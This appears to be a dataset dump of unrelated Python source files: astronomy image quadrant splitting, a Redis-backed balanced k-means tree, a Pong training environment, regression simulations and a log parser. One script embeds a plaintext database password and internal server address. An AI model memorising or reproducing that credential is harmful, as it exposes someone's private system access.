ztfsci_list = zquery.get_data_path(source=\"local\", suffix=\"sciimg.fits\")\n if (len(ztfsci_list)!=4):\n raise ValueError(\"Wrong number of science files for CCD image:\", self.imgfile)\n return ztfsci_list\n\n def ccd_to_quadrant(self, ccd):\n # Divide CCD image in quadrant\n nX = int(len(ccd[0])/2)\n nY = int(len(ccd)/2)\n quad = []\n # Quadrant 01\n q1 = ccd[nY:2*nY,nX:2*nX]\n q1 = np.rot90(q1, 2)\n quad.append(q1)\n # Quadrant 02\n q2 = ccd[nY:2*nY,0:nX]\n q2 = np.rot90(q2, 2)\n quad.append(q2)\n # Quadrant 03\n q3 = ccd[0:nY,0:nX]\n q3 = np.rot90(q3, 2)\n quad.append(q3) \n # Quadrant 04\n q4 = ccd[0:nY,nX:2*nX]\n q4 = np.rot90(q4, 2)\n quad.append(q4)\n return quad\n\n def write_quad(self, quad):\n # Get ZTF science image names\n ztfscilist = self.get_sci_list()\n # Get my science image names\n myscilist = self.get_my_sci_list()\n # Write each new science quadrant image with original ZTF HDU\n for i in range(len(myscilist)): \n ztf = fits.open(ztfscilist[i])\n hdr = ztf[0].header\n os.system(\"rm \"+myscilist[i])\n hdu = fits.PrimaryHDU(data=quad[i], header=hdr)\n hdu.writeto(myscilist[i]) \n return \n","sub_path":"ztfccdimage.py","file_name":"ztfccdimage.py","file_ext":"py","file_size_in_byte":16662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"366483203","text":"#!/usr/bin/python3.4\n#-*- coding: utf-8 -*-\n\n\"\"\" \nLeftovers from the projects resolutions, to take a deeper look\n\n\"\"\"\n\ndef combination(values,first=False,final=[]):\n\t\"\"\"\n\tReturns a list with all possible combinations of items in list 'values'\n\n\tIt returns with duplicates, it must be a faster/cleaner way of doing it\n\t\"\"\"\n\n\tif len(values) > 0:\n\t\t\n\t\tfinal.append(values)\n\t\tcombination(values[1:],final=final)\n\t\t\t\t\n\t\tfor n in range(1,len(values)):\n\t\t\tnew_values = copy.deepcopy(values)\n\t\t\tnew_values.pop(n)\n\t\t\tcombination(new_values,final=final)\n\n\tif first:\n\t\treturn 
final\n\n","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19765907","text":"# -*- coding: utf-8 -*-\nimport pymssql\nimport numpy as np\nfrom numpy.linalg import solve\n'''\na=np.mat([[2,3],[1,3]])#系数矩阵\nb=np.mat([0,0]).T #常数项列矩阵\nx=solve(a,b) #方程组的解\nprint(x)\n'''\n\ndef sv(x1,x2,y1,y2):\n a = np.array([[x1, x2], [1, 1]])\n b = np.array([y1, y2])\n return solve(a, b)\n\n\nwith pymssql.connect(host='10.1.42.103', user=\"sa\", password=\"qfc23834358Q\",database=\"test2\") as conn:\n cur=conn.cursor()\n #cur.execute(\"select [工程编号],[小计],[施工服务],[填报工时],[总预算工时] from wh_table2 where [工程编号] in ('GC150235','GC150082','GC160217','GC150067','GC170374','GC170117') order by [工程编号] asc\")\n #cur.execute(\"select [工程编号],[小计],[施工服务],[填报工时],[总预算工时] from wh_table2 where [工程编号] in ('GC150235','GC160217','GC150067','GC170374') order by [工程编号] asc\")\n cur.execute(\"select [工程编号],[小计],[施工服务],[总预算工时]*[总工时系数],[总预算工时] from wh_table2 where [阶段组合] IN ('初设+施工图+施工服务','方案+施工图+施工服务','方案+初设+施工图+施工服务','施工图+施工服务','方案配合+初设+施工图+施工服务','方案配合+初设配合+施工图+施工服务') and [施工服务]>0 and [小计]>0.2 and [工程编号] in (select fd_project_no from [10.1.1.117].cip.dbo.wt_project_info where doc_create_time>'2015-01-01' and doc_company_id in (select fd_id from [10.1.1.117].cip.dbo.sys_org_element where fd_ldap_dn='OU=深圳公司,OU=华阳设计,OU=华阳国际,DC=capol,DC=cn')) order by [工程编号] asc\")\n res=cur.fetchall()\n a_y=b_y=0\n z_t=z_y=0\n a_t=b_t=0\n for (gcno,x1,x2,y1,y2) in res:\n x=sv(x1,x2,y1,y2)\n print(gcno)\n print(x)\n a_y+=x[0]\n b_y+=x[1]\n z_t+=y1\n z_y+=y2\n a_t+=x[0]*x1\n b_t+=x[1]*x2\n r={'设计预算':a_y,'设计填报':a_t,'施工预算':b_y,'施工填报':b_t,'总预算':z_y,'总填报':z_t}\n print(r)\n \n print(r['设计预算']+r['施工预算'])\n print(r['总预算'])\n print(r['设计填报']+r['施工填报'])\n print(r['总填报'])\n print(r['设计填报']/r['设计预算'])\n 
print(r['施工填报']/r['施工预算'])\n\n\n","sub_path":"工时系数解方程测试.py","file_name":"工时系数解方程测试.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"607419679","text":"import redis\nimport random\nimport time\nimport queue\nimport numpy as np\nfrom .redis_db import RedisDBWrapper\nfrom .fast_kmeans import FastKmeans\n\n\n#代表Balanced K-means tree的节点\nclass BKTNode(object):\n\n def __init__(self):\n self.id = str(id(self))\n self.cluster_id = None\n self.children = []\n self.parent = None\n self.centriod = None\n self.leaf = False\n\n #读取该节点的数据,如果是叶节点,则只读取它所对应的簇数据,如果是非叶节点,则读取它子树的所有簇数据\n #参数 redis_handler: redis handler\n #参数 bkt_key: 该节点所在的树的唯一标识\n def get_data(self, redis_handler, bkt_key):\n if not redis_handler:\n return None\n\n if self.leaf:\n return redis_handler.get_data(bkt_key + '_' + self.parent.id + '_' + str(self.cluster_id))\n\n merged_data = np.zeros(shape = (1, self.centriod.shape[0]))\n\n for child in self.children:\n data = child.get_data(redis_handler, bkt_key)\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n return merged_data[1:]\n\n\n#代表Balanced K-means tree\nclass BKTree(object):\n\n #初始化Balanced K-means tree\n #参数 max_clusters_per_run: 指定每次K-means聚类的最大簇数量\n #参数 max_depth : 指定树的高度限制\n #参数 min_cluster_size : 指定簇中数据的最小数量,即最小簇大小\n #参数 sc : spark context\n #参数 redis_host : 指定用于存储簇数据的redis host\n #参数 redis_port : 指定用于存储簇数据的redis port\n #参数 max_cluster_size : 指定簇中数据的最大数量,是个软约束,如果不指定的话就默认是min_cluster_size的2倍\n def __init__(self, max_clusters_per_run, max_depth, min_cluster_size, sc, redis_host, redis_port = 6379, max_cluster_size = 0, balance = True):\n self.__max_clusters_per_run = max_clusters_per_run\n self.__max_depth = max_depth\n self.__min_cluster_size = min_cluster_size\n self.__max_cluster_size = max(self.__min_cluster_size, max_cluster_size)\n self.__sc = sc\n self.__redis_host = redis_host\n self.__redis_port = redis_port\n self.__bkt_key = 
str(id(self))\n self.__balance = balance\n self.__root_node = BKTNode()\n self.__redis = RedisDBWrapper(redis_host, redis_port)\n\n def get_root(self):\n return self.__root_node\n\n def get_key(self):\n return self.__bkt_key\n\n def get_redis(self):\n return self.__redis.getHandler()\n\n def get_leaf_nodes(self):\n leaf_nodes = []\n\n q = queue.Queue()\n q.put(self.__root_node)\n\n while not q.empty():\n node = q.get()\n\n if node.leaf:\n leaf_nodes.append(node)\n else:\n for child in node.children:\n q.put(child)\n\n return leaf_nodes\n\n\n def dump(self):\n\n epochTime = int(time.mktime(time.localtime()))\n\n tree_params = self.__bkt_key + '_' + str(self.__max_clusters_per_run) + '_' + str(self.__max_depth) + '_' \\\n + str(self.__min_cluster_size) + '_' + str(self.__max_cluster_size) + '_' \\\n + str(self.__balance) + '_' + self.__root_node.id\n\n self.get_redis().sadd('my_bkt', str(epochTime) + '_' + tree_params)\n\n q = queue.Queue()\n q.put(self.__root_node)\n\n try:\n while not q.empty():\n node = q.get()\n\n if node.leaf:\n value = '1_' + str(node.cluster_id)\n elif node.cluster_id:\n value = '0_' + str(node.cluster_id)\n else:\n value = '0_0'\n\n ret = self.get_redis().set(self.__bkt_key + '_' + node.id, value)\n if not ret:\n raise Exception(\"Failed to dump BKT node to redis\")\n\n for child in node.children:\n ret = self.get_redis().sadd(self.__bkt_key + '_' + node.id + '_children', child.id)\n if not ret:\n raise Exception(\"Failed to dump BKT sub tree to redis\")\n\n q.put(child)\n\n return True\n except Exception as e:\n print(e)\n return False\n\n\n def update_centroid(self, node):\n\n if node.leaf:\n data = self.__redis.get_data(self.__bkt_key + '_' + node.parent.id + '_' + str(node.cluster_id))\n total_sum = data.sum(axis = 0)\n total_size = len(data)\n\n node.centriod = total_sum / total_size\n\n return (total_sum, total_size)\n\n cluster_list = []\n for child in node.children:\n cluster_list.append(self.update_centroid(child))\n\n total_sum = 
np.zeros(shape = (cluster_list[0][0].shape[0], ))\n total_size = 0\n\n for sum, size in cluster_list:\n total_sum += sum\n total_size += size\n\n node.centriod = total_sum / total_size\n\n return (total_sum, total_size)\n\n\n @classmethod\n def loads(cls, bkt_key, redis_host, redis_port = 6379):\n\n redis = RedisDBWrapper(redis_host, redis_port)\n\n trees = redis.getHandler().smembers('my_bkt')\n found = False\n\n for tree in trees:\n if bkt_key == tree.split('_')[1]:\n\n _, bkt_key, max_clusters_per_run, \\\n max_depth, min_cluster_size, max_cluster_size, balance, root_id = tree.split('_')\n\n found = True\n break\n\n if not found:\n return None\n\n bkt = BKTree(int(max_clusters_per_run), int(max_depth), int(min_cluster_size), \\\n None, redis_host, redis_port, int(max_cluster_size), bool(balance))\n\n bkt.__bkt_key = bkt_key\n bkt.__redis = redis\n bkt.__root_node.id = root_id\n\n try:\n q = queue.Queue()\n q.put(bkt.__root_node)\n\n while not q.empty():\n node = q.get()\n\n if not node.leaf:\n children_ids = bkt.get_redis().smembers(bkt.__bkt_key + '_' + node.id + '_children')\n else:\n data = bkt.__redis.get_data(bkt.__bkt_key + '_' + node.parent.id + '_' + str(node.cluster_id))\n\n node.centriod = data.sum(axis = 0) / len(data)\n children_ids = []\n\n\n for child_id in children_ids:\n child_info = bkt.get_redis().get(bkt.__bkt_key + '_' + child_id)\n\n child_node = BKTNode()\n child_node.id = child_id\n\n child_node.leaf = True if child_info.split('_')[0] == '1' else False\n child_node.cluster_id = int(child_info.split('_')[1])\n child_node.parent = node\n\n q.put(child_node)\n\n node.children.append(child_node)\n\n bkt.update_centroid(bkt.__root_node)\n\n return bkt\n\n except Exception as e:\n print(e)\n return None\n\n\n\n def __get_nearest_cluster(self, point, node, leaf_clusters):\n\n if node.leaf:\n leaf_clusters.append((node, np.sqrt(((point - node.centriod) ** 2).sum())))\n\n for child in node.children:\n self.__get_nearest_cluster(point, child, 
leaf_clusters)\n\n #返回与指定的数据点最接近的簇所对应的节点\n #参数 point: 要检索的数据点\n def get_nearest_leaf_node(self, point):\n\n leaf_clusters = []\n\n for child in self.__root_node.children:\n self.__get_nearest_cluster(point, child, leaf_clusters)\n\n if len(leaf_clusters) == 0:\n return None\n\n leaf_clusters = sorted(leaf_clusters, key = lambda x: x[1])\n\n return leaf_clusters[0][0]\n\n #获取与指定的数据点最接近的簇数据\n #参数 point: 要检索的数据点\n def get_nearest_cluster(self, point):\n\n node = self.get_nearest_leaf_node(point)\n if node:\n return node.get_data(self.__redis, self.__bkt_key)\n\n return None\n\n #构建balanced k-means tree\n #参数 data: numpy array类型的数据集\n def build(self, data):\n size = len(data)\n if size == 0:\n return self.__root_node\n\n max_cluster_size = max(self.__min_cluster_size * 2, self.__max_cluster_size)\n\n if size <= max_cluster_size:\n cur_node = BKTNode()\n cur_node.parent = self.__root_node\n cur_node.centriod = data.sum(axis = 0) / len(data)\n cur_node.cluster_id = 0\n\n self.__redis.save_data(data, self.__bkt_key + '_' + self.__root_node.id + \"_\" + str(cur_node.cluster_id))\n self.__root_node.children.append(cur_node)\n\n return self.__root_node\n\n k = min(size / max_cluster_size + 1, self.__max_clusters_per_run)\n\n clusters = FastKmeans.fit(data, k, self.__redis_host, self.__redis_port, self.__sc, self.__bkt_key + '_' + self.__root_node.id)\n\n for cid, centriod, _, ret in clusters:\n if not ret:\n print(\"Failed to build BKT due to redis write error\")\n return None\n\n child_node = self.make_bkt_node(cid, centriod, self.__root_node)\n if not child_node:\n print(\"Failed to build BKT\")\n return None\n\n self.__root_node.children.append(child_node)\n\n self.adjust_tree_depth()\n\n self.update_centroid(self.__root_node)\n\n return self.__root_node\n\n #构建balanced k-means tree的节点\n #参数 centriod_id: 该节点所对应的簇id\n #参数 centriod: 该节点所对应的簇中心\n #参数 parent_node: 该节点的父节点\n def make_bkt_node(self, cluster_id, centriod, parent_node):\n\n cur_node = BKTNode()\n cur_node.parent 
= parent_node\n cur_node.centriod = centriod\n cur_node.cluster_id = cluster_id\n\n #读取该节点所对应簇的数据\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(cluster_id))\n\n size = len(data)\n max_cluster_size = max(self.__min_cluster_size * 2, self.__max_cluster_size)\n\n #如果该节点所对应簇的数据量小于max_cluster_size,则完成一个叶子节点\n if size <= max_cluster_size:\n cur_node.leaf = True\n return cur_node\n\n #计算该节点中的数据还可以分成几个簇,如果只能分成2个簇,则做均分处理,否则进行一轮K-means聚类\n k = min(int(size / max_cluster_size + 1), self.__max_clusters_per_run)\n\n if self.__balance:\n if k == 2:\n clusters = self.half_cut_cluster(data, self.__bkt_key + '_' + cur_node.id)\n else:\n clusters = FastKmeans.fit(data, k, self.__redis_host, self.__redis_port, self.__sc, self.__bkt_key + '_' + cur_node.id)\n else:\n clusters = FastKmeans.fit(data, k, self.__redis_host, self.__redis_port, self.__sc, self.__bkt_key + '_' + cur_node.id)\n\n if False in [ret for _, _, _, ret in clusters]:\n print(\"Failed to build BKT due to redis write error\")\n return None\n\n #检查K-means聚类所产生的簇,将小于min_cluster_size的簇归并起来\n if k > 2 and self.__balance:\n clusters = self.merge_small_clusters(clusters, cur_node)\n\n #对聚类所形成的新簇递归构建子树\n for cid, centriod, _, _ in clusters:\n child_node = self.make_bkt_node(cid, centriod, cur_node)\n if not child_node:\n return None\n\n cur_node.children.append(child_node)\n\n return cur_node\n\n #将数据切分成大小相等的两个簇\n def half_cut_cluster(self, data, cluster_key, cluster_ids = ()):\n\n clusters = []\n if len(cluster_ids) == 0:\n first_id = 0\n second_id = 1\n else:\n first_id, second_id = cluster_ids\n\n data_len = int(len(data) / 2)\n\n ret = self.__redis.save_data(data[:data_len], cluster_key + \"_\" + str(first_id))\n cluster = (first_id, data[:data_len].sum(axis = 0) / data_len, data_len, ret)\n clusters.append(cluster)\n\n data_len = len(data) - int(len(data) / 2)\n ret = self.__redis.save_data(data[int(len(data) / 2):], cluster_key + \"_\" + str(second_id))\n cluster = (second_id, 
data[int(len(data) / 2):].sum(axis = 0) / data_len, data_len, ret)\n clusters.append(cluster)\n\n return clusters\n\n #检查K-means聚类所产生的簇,将小于min_cluster_size的簇归并起来\n def merge_small_clusters(self, clusters, parent_node):\n\n clusters = sorted(clusters, key = lambda x: x[2])\n to_merges = []\n\n for i, cluster in enumerate(clusters):\n if cluster[2] < self.__min_cluster_size:\n to_merges.append((cluster[0], cluster[2]))\n else:\n clusters = clusters[i:]\n break\n\n max_cluster_size = max(self.__min_cluster_size * 2, self.__max_cluster_size)\n\n if len(to_merges) == 0:\n return clusters\n\n if len(to_merges) == len(clusters):\n clusters = []\n new_cid = max([cluster[0] for cluster in to_merges]) + 1\n else:\n new_cid = max([cluster[0] for cluster in clusters]) + 1\n\n i = 0\n new_clusters = []\n\n while i < len(to_merges):\n\n merged_data = np.zeros(shape = (1, parent_node.centriod.shape[0]))\n\n size = 0\n\n while i < len(to_merges) and size + to_merges[i][1] <= max_cluster_size:\n\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(to_merges[i][0]))\n\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n size += to_merges[i][1]\n\n i += 1\n\n if size >= self.__min_cluster_size and size <= max_cluster_size:\n\n merged_data = merged_data[1:]\n ret = self.__redis.save_data(merged_data, self.__bkt_key + '_' + parent_node.id + '_' + str(new_cid))\n\n new_cluster = (new_cid, merged_data.sum(axis = 0) / len(merged_data), len(merged_data), ret)\n new_clusters.append(new_cluster)\n\n #如果就剩下最后一个小簇,那么表示在它前面的小簇都合并完了,并且合并后的大小小于max_cluster_size,那么就把这最后一个小簇也合并掉,\n #这样这个簇大小肯定超过max_cluster_size了,可以继续在下次迭代中分裂。\n if i == len(to_merges) - 1:\n\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(to_merges[i][0]))\n\n merged_data = np.concatenate((merged_data, data), axis = 0)\n ret = self.__redis.save_data(merged_data, \\\n self.__bkt_key + '_' + parent_node.id + '_' + str(new_cid))\n\n new_cluster = (new_cid, 
merged_data.sum(axis = 0) / len(merged_data), len(merged_data), ret)\n new_clusters[len(new_clusters) - 1] = new_cluster\n break\n\n #如果小簇合并后还是小于min_cluster_size,那么就和第一个大簇合并,并且将合并之后的簇再对半切成两个均等的簇,继续在下次迭代中分裂。\n #在这一步中,如果不做对半切,算法可能永远无法收敛\n if size < self.__min_cluster_size and len(clusters) > 0:\n\n data = self.__redis.get_data(self.__bkt_key + '_' + parent_node.id + '_' + str(clusters[0][0]))\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n new_clusters.extend(self.half_cut_cluster(merged_data[1:], self.__bkt_key + '_' + parent_node.id, (new_cid, new_cid + 1)))\n new_cid += 1\n clusters = clusters[1:]\n break\n\n new_cid += 1\n\n new_clusters.extend(clusters)\n\n return new_clusters\n\n #获取指定节点的子树高度\n def get_tree_depth(self, node):\n\n if len(node.children) == 0:\n return 0\n\n depths = []\n for child in node.children:\n depths.append(self.get_tree_depth(child) + 1)\n\n return max(depths)\n\n #调整指定节点下的子树高度\n def __adjust_tree_depth(self, node):\n\n if len(node.children) == 0:\n return\n\n all_leaf_childs = np.array([child.leaf for child in node.children]).all()\n\n if not all_leaf_childs:\n children = node.children\n\n for child in children:\n if not child.leaf:\n self.__adjust_tree_depth(child)\n\n if len(children) != len(node.children):\n merged_data = np.zeros(shape = (1, node.centriod.shape[0]))\n\n for child in node.children:\n data = self.__redis.get_data(self.__bkt_key + '_' + node.id + '_' + str(child.cluster_id))\n\n merged_data = np.concatenate((merged_data, data), axis = 0)\n\n node.centriod = merged_data.sum(axis = 0) / (len(merged_data) - 1)\n\n return\n\n parent_cluster_ids = [child.cluster_id for child in node.parent.children]\n new_cluster_id = max(parent_cluster_ids) + 1\n\n for child in node.children:\n data = self.__redis.get_data(self.__bkt_key + '_' + node.id + '_' + str(child.cluster_id))\n if data is None:\n print(self.__bkt_key + '_' + node.id + '_' + str(child.cluster_id))\n\n self.__redis.save_data(data, self.__bkt_key + 
'_' + node.parent.id + '_' + str(new_cluster_id))\n\n child.cluster_id = new_cluster_id\n child.parent = node.parent\n\n node.parent.children.append(child)\n\n new_cluster_id += 1\n\n node.parent.children.remove(node)\n\n #调整树高度\n def adjust_tree_depth(self):\n\n while self.get_tree_depth(self.__root_node) > self.__max_depth:\n self.__adjust_tree_depth(self.__root_node)\n","sub_path":"balanced_kmeans_tree/bk_tree.py","file_name":"bk_tree.py","file_ext":"py","file_size_in_byte":18256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"153552457","text":"import os\nimport sys\nimport neat\nimport random\nimport datetime\nimport argparse\nimport numpy as np\nfrom tqdm import tqdm\n\nwin_width = 400\nwin_height = 400\n\np_width = 20\np_height = 90\n\nball_radius = 5\nball_v_limit = 3\n\nlimit_pv = 3\nlimit_p2_up = 3\nlimit_p2_down = 2\n\n\ndef move_player(player,v,min_lim,max_lim):\n y = player[1] + v\n y = max(y,min_lim)\n y = min(y,max_lim)\n return [player[0],y]\n\ndef v_pc_player(pc_center,ball,v_limits):\n if pc_center < ball[1]:\n return v_limits[1]\n elif pc_center > ball[1]:\n return -v_limits[0]\n else:\n return 0\n\ndef move_ball(posx,posy,vx,vy):\n return (posx+vx,posy+vy)\n\ndef evaluate_net(net,show_game=False,n_loops=3):\n total_score = 0\n if show_game:\n import pong_pygame\n for iloop in range(n_loops):\n total_score += pong_pygame.net_play(net,show_game)\n else:\n for iloop in range(n_loops):\n total_score += net_play(net)\n return total_score/n_loops\n\ndef net_play(net):\n\n p1 = [p_width/2,win_height/2-p_height/2]\n p2 = [win_width-3*p_width/2,win_height/2-p_height/2]\n p1_v = 0\n p2_v = 0\n\n ball = [int(win_width/4),int(win_height/2)]\n\n ball_vx = 1 \n ball_vy = random.sample([-1,0,1],1)[0]\n\n n_balls_touch = 0\n n_walks = 0\n zero_v_plays = 0\n \n winner = False\n run = True\n while run:\n\n pl_input = np.array([p1[1],ball[0],ball[1],ball_vx,ball_vy,p2[1]])\n #player_vertical_position = 
p1[1]\n #ball_horizontal_posiiton = ball[0]\n #ball_vertical_position = ball[1]\n #ball_horizontal_velocity = ball_vx\n #ball_vartical_velocity = ball_vy\n #oponent_vertical_position = p2[1]\n\n #output = np.array(net.activate(tuple(input)))\n pl_input = np.array([pl_input])\n output = net.activate(pl_input).numpy()\n move = np.argmax(output[0])\n\n if move == 1:\n p1_v = -limit_pv\n elif move == 2:\n p1_v = limit_pv\n \n # Conta numero de passos do player 1\n n_walks += abs(p1_v)\n\n p1 = move_player(p1,p1_v,0,win_height-p_height)\n\n # p2 acompanha a bola se ela está na metade dele da tela\n if ball[0] >= win_width/2:\n p2_v = v_pc_player(p2[1]+p_height/2,ball,(limit_p2_up,limit_p2_down))\n else:\n p2_v = 0\n p2 = move_player(p2,p2_v,0,win_height-p_height)\n \n ball = move_ball(ball[0],ball[1],ball_vx,ball_vy)\n\n # Bola bate no player 1\n if ball[0] <= p1[0] + p_width:\n\n # Contar vezes que os players jogaram parados\n if p1_v == p2_v == 0:\n zero_v_plays += 1\n\n if p1[1] <= ball[1] <= p1[1]+p_height:\n ball_vx = -ball_vx\n # Mudar a velocidade vertical da bola\n if p1_v != 0:\n iball_vy = ball_vy+abs(p1_v)/p1_v\n if iball_vy >= 0:\n ball_vy = int(min(iball_vy,ball_v_limit))\n else:\n ball_vy = int(max(iball_vy,-ball_v_limit))\n #ball_vy = min(ball_vy+p1_v,ball_v_limit)\n n_balls_touch += 1\n else:\n run = False\n # Bola bate no player 2\n elif ball[0] >= p2[0]:\n if p2[1] <= ball[1] <= p2[1]+p_height:\n ball_vx = -ball_vx\n # Mudar a velocidade vertical da bola\n if p2_v != 0:\n iball_vy = ball_vy+abs(p2_v)/p2_v\n if iball_vy >= 0:\n ball_vy = int(min(iball_vy,ball_v_limit))\n else:\n ball_vy = int(max(iball_vy,-ball_v_limit))\n #ball_vy = min(ball_vy+p1_v,ball_v_limit)\n else:\n run = False\n winner = True\n \n # Bola bater nas paredes verticais\n if ball[1] >= win_height or ball[1] <= 0:\n ball_vy = -ball_vy\n\n # Punir jogos longos parados\n if n_balls_touch >= 3:\n if zero_v_plays == n_balls_touch:\n run = False\n n_balls_touch = 0\n p1[1] = 
win_height*2\n\n # Impedir jogos inifinitos\n if n_balls_touch >= 50:\n run = False\n winner = False\n\n score = n_balls_touch\n\n # winner, score, i_distance_to_ball\n winn = 1 if winner else 0\n i_distance_to_ball = 0 if winner else (win_height - abs((p1[1]+p_height/2)-ball[1]))\n\n #print([winn, score, i_distance_to_ball])\n return (10**2)*winn + score","sub_path":"tensorflow-neat/Pong/pong_game.py","file_name":"pong_game.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"64815156","text":"from __future__ import division\nfrom __future__ import print_function\nimport numpy as np\nimport csv\nfrom sklearn.linear_model import Lasso\nfrom random import randint\nfrom collections import defaultdict\nfrom imputation import ImputationMissingData\nfrom data import DataMatrix, DiagonalData\nfrom math import e\n\nif __name__ == '__main__':\n # Set the parameters\n # Set the parameters\n n = 100 \n p = 20 \n sigma = 0 # additive noise\n sparse = True\n s = int(np.sqrt(p)) + 1 # square root sparsity\n\n if sparse:\n # Square root sparsity\n beta0 = np.zeros(p)\n for i in range(s):\n beta0[i] = 1/np.sqrt(s)\n else: \n beta0 = np.ones(p)\n \n # Run a simulation\n num_trials = 1 \n alpha_list = np.linspace(0.5, 0.99, 5)\n error_vals, max_error_vals, min_error_vals = [], [], [] \n for alpha in alpha_list:\n avg_error, max_error, min_error = 0, 0, 10000\n for i in range(num_trials):\n diag_dict = {'diagonal': np.ones(p)\\\n , 'n': n\\\n , 'p': p}\n simple_gaussian = DiagonalData(diag_dict)\n\n imputation_dict = {'sparse': sparse\\\n , 'beta0': beta0\\\n , 'sigma': sigma\\\n , 'data': simple_gaussian\\\n , 'alpha': alpha\\\n , 'lambda': np.sqrt(alpha * (1 - alpha)) * np.sqrt(np.log(p)/n)}\n imputation_test = ImputationMissingData(imputation_dict)\n\n error = imputation_test.get_l2_error()\n avg_error += error\n if error > max_error:\n max_error = error\n if error < min_error:\n 
min_error = error\n avg_error = avg_error/num_trials\n\n error_vals.append(avg_error)\n max_error_vals.append(max_error)\n min_error_vals.append(min_error)\n\n data = np.array([alpha_list, error_vals, min_error_vals,max_error_vals]).transpose()\n print(data.shape)\n\n np.savetxt('IdentityGaussianBig.dat', data, \\\n fmt=['%.2f', '%.4f', '%.6f', '%.8f'], \\\n header='alpha err min_err max_err', \\\n comments='# ')\n","sub_path":"simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39078837","text":"\"\"\"\r\nBall Class\r\n\"\"\"\r\nfrom random import Random\r\nimport math\r\nimport pygame\r\nfrom CONSTANTS import *\r\nfrom genes import Genes\r\nfrom myvector import myvector\r\n\r\nRADIUS = 10\r\n\r\nclass Ball:\r\n\tdef __init__(self):\r\n\t\tself.genes = Genes(1000)\r\n\t\tself.pos = myvector(70, HEIGHT/2)\r\n\t\tself.vel = myvector(0, 0)\r\n\t\tself.acc = myvector(0, 0)\r\n\r\n\t\tself.dead = False\r\n\t\tself.reached_goal = False\r\n\t\tself.is_best = False\r\n\t\tself.fitness = 0\r\n\r\n\t\tself.color = (255, 0, 102)\r\n\t\tself.fitness = 0\r\n\r\n\r\n\r\n\tdef draw(self, WIN):\r\n\t\tif self.is_best:\r\n\t\t\tpygame.draw.circle(WIN, BEST_BALL, (self.pos.x, self.pos.y), RADIUS)\r\n\t\telse:\r\n\t\t\tpygame.draw.circle(WIN, self.color, (self.pos.x, self.pos.y), RADIUS)\r\n\r\n\r\n\tdef move(self):\r\n\t\tif self.genes.step < self.genes.size:\r\n\t\t\tacc = self.genes.vectors[self.genes.step]\r\n\t\t\tself.genes.step += 1\r\n\t\t\tself.vel.add(acc)\r\n\t\t\tself.vel.limitVelocity(4)\r\n\t\t\tself.pos.add(self.vel)\r\n\t\telse:\r\n\t\t\tself.dead = True\r\n\r\n\tdef update(self):\r\n\t\tif (not self.reached_goal) and (not self.dead):\r\n\t\t\tself.move()\r\n\t\tif not self.is_inside():\r\n\t\t\tself.dead = True\r\n\t\telif self.calculateDistancetoGoal() < 10:\r\n\t\t\tself.reached_goal = True\r\n\r\n\r\n\r\n\tdef is_inside(self) -> 
bool:\r\n\t\tif self.pos.x < 0 or self.pos.x > WIDHT or self.pos.y < 0 or self.pos.y > HEIGHT:\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef calculateDistancetoGoal(self):\r\n\t\treturn math.dist([self.pos.x, self.pos.y], [GOAL_X, GOAL_Y])\r\n\t\r\n\tdef calculateFitness(self):\r\n\t\tif self.reached_goal:\r\n\t\t\tself.fitness = 1/15 + 10000/(self.genes.step * self.genes.step)\r\n\t\telse:\r\n\t\t\tdist = self.calculateDistancetoGoal()\r\n\t\t\tself.fitness = 1/(dist**2)\r\n\r\n\tdef haveBaby(self):\r\n\t\tbaby = Ball()\r\n\t\tbaby.genes = self.genes.copy()\r\n\t\treturn baby\r\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"405200103","text":"import os\nimport openpyxl\nimport test\npath=os.getcwd()\nnew_path=path+'\\log'\nbook={}\n\nnamefile=open('FE-4KB.txt')\n# log_name='2018-12-12(综合电检设备).log'\nlog_name=input('输入log文件路径=')\n# log_filename=log_name\n# log_excel_name=log_name+'.xlsx'\n\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Font, Color\nfrom openpyxl.styles import colors\n#\n# ft=Font(color=colors.RED)\n#\nwb=Workbook()\n# i=1\nfor nameline in namefile.readlines():\n if nameline.find('0x')>-1:\n ECU_name=nameline[:nameline.index('\\t')]\n Req_ID=nameline[nameline.index('0x')+2:nameline.index('0x')+5]\n Res_ID = nameline[nameline.index('0x') + 7:nameline.index('0x') + 10]\n print(ECU_name+Req_ID+Res_ID)\n log_file=open(log_name)\n# # log_file = open('log_VF11.txt')\n# log type: $07,$E4,$0C,$00,$00,$07,$EC\n KB_ID='$0'+Req_ID[0:1]+','+'$'+Req_ID[1:3]+',$0C,$00,$00,'+'$0'+Res_ID[0:1]+','+'$'+Res_ID[1:3]\n print('KB_ID=',KB_ID)\n book[KB_ID]=ECU_name\n\n\n#\n sheet = wb.create_sheet()\n# # i=i+1\n sheet.title = ECU_name\n#\n# print(book.keys())\n# print(book.values())\n\nfor line in log_file.readlines():\n for ID in book.keys():\n if line.find(ID)>=0:\n # print(line)\n sheet=wb[book[ID]]\n 
